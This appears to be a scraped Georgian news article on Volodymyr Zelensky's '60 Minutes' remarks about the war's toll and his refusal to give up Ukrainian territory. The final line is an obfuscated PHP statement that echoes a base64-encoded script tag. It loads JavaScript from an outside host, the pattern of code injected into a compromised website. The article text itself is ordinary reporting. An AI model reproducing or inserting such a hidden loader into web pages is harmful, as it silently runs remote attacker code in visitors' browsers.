celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმერ ზელენსკიმ განაცხადა, რომ უცხოელები რუსეთ-უკრაინის ომის სრული მასშტაბის გასაგებად, უკრაინაში უნდა ჩავიდნენ და ყველაფერი საკუთარი თვალით უნდა ნახონ.  
 
ზელენსკის თქმით, უკრაინამ ბევრი სიცოცხლე გაიღო ტერიტორიების დასაცავად და სახელმწიფოს შესანარჩუნებლად, ამიტომ ახლა დათმობა მათ წინაშე დანაშაულია. 
 
 
„ვის ესმის ომი? მათ, ვინც რამე დაკარგა ამ ომში. ყველაზე მეტად ისინი ხვდებიან, რომლებმაც ამ ომში ახლობლები დაკარგეს. მე არ დამიკარგავს ახლობელი ადამიანები. მიუხედავად იმისა, რომ ომის ყველა დეტალი არ ვიცი, რადგან მე პრეზიდენტი ვარ, უფრო ღრმად ვიცი ომი, ვიდრე ჩვეულებრივმა ადამიანებმა, ყველაფერს ისე ვგრძნობ, როგორც ის ადამიანები, რომლებმაც ახლობლები დაკარგეს, მაგრამ მე ოჯახი არ დამიკარგავს, მიუხედავად ამისა, ვიცი ამ ომის ფასი.
 
სიკვდილი, უბრალოდ სიკვდილი ვნახე. ქალაქში 300 ათასი ადამიანი ცხოვრობდა, შენ ხედავ სიკვდილს იმიტომ რომ ქუჩები ცარიელია. მიტოვებული ტექნიკა. რუსი სამხედროების, უკრაინელი სამხედროების, ჩვეულებრივი მოქალაქეების ავტომობილები. ვიდრე მე ჩავიდოდი ცხედრები ქუჩებიდან რამდენიმე დღის განმავლობაში გაჰქონდათ, მაგრამ თუ შეხვალ რომელიმე მრავალსართულიანი სახლის ეზოში იქ საშინელება დაგხვდება. ეს არის სიკვდილი. ქუჩაში არ ისმის ხმები, მანქანები არ დადიან, ბავშვები არ იცინიან. არავინ ასიგნალებს“, – თქვა პრეზიდენტმა.
 
გადაცემა "60 წუთის" ჟურნალისტმა ზელენსკის ჰკითხა, არის თუ არა უკრაინა მზად მშვიდობის სანაცვლოდ ტერიტორიები დათმოს. 
 
პრეზიკენტის თქმით, ის არ არის მზად ამისთვის და არ სურს ისეთ სიტუაციაში ყოფნა, სადაც შესაძლოა, საკითხი ასე დადგეს – „ვფიქრობ, ამისთვის მზად რომ ვყოფილიყავით, ომი არ იქნებოდა“.
 
„საერთო ჯამში, ჩვენ არ ვართ მზად, დავთმოთ ჩვენი სახელმწიფო, ჩვენი ტერიტორიები. ასე გიპასუხებთ, არ ვისურვებდი ისეთ სიტუაციაში აღმოჩენას, როცა მე მომიწევს ამაზე სერიოზულად დაფიქრება და ამ კითხვაზე პასუხის გაცემა რეალურად. მე ძალიან არ მინდა ეს. ვფიქრობ, ჩვენ უკვე გავიღეთ ბევრი სიცოცხლე და გავიღეთ, რადგან შეგვენარჩუნებინა სახელმწიფო და სწორედ ამიტომ, ჩვენ სულ მცირე მათ წინაშე ვიქნებით დამნაშავე. ამიტომ, უნდა ვიდგეთ იმდენ ხანს, რამდენსაც შევძლებთ, მაგრამ ეს ცხოვრებაა და ყველაფერი ხდება. ჩვენ ვიცით რუსული მხარე. გვესმის, რომ ეს ერთ-ერთი პუნქტია, ისინი მუდმივად ამბობენ: აღიარეთ ყირიმი რუსეთის ტერიტორიად. მე ზუსტად ვიცი, რომ ამას არ გავაკეთებ. მათ სურთ დონბასის საკითხის გადაჭრა, მადა ეზრდებათ, მათ მთელი დონბასი სურთ და ვიცი, რომ ილტყვიან, ქვეყნის სამხრეთიც აიღონ“, – განაცხადა უკრაინის პრეზიდენტმა.
 
773
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");